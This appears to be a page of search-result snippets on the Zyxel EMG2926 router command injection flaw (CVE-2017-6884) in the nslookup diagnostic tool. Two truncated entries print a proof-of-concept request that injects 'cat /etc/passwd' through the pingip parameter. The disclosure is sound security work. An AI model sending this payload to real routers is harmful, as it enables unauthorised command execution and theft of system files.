Zyxel EMG2926 Routers Command Injection Vulnerability

Zyxel EMG2926 routers contain a command injection vulnerability located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute malicious commands on the router, such as the pingip parameter to the expert/maintenance/diagnostic/nslooku...

Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884)

A command injection vulnerability exists in Zyxel EMG2926. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the router...

CVE-2017-6884

The CVE-2017-6884 issue affects Zyxel EMG2926 routers (firmware around V1.00(AAQT.4)b8). The vulnerability is a command injection in the nslookup diagnostic tool that an authenticated, remote attacker can exploit via crafted HTTP requests (e.g., manipulating the ping_ip parameter in expert/mainte...

Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection

Zyxel EMG2926 V1.00AAQT.4b8 - OS Command Injection Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel...

Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection

Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...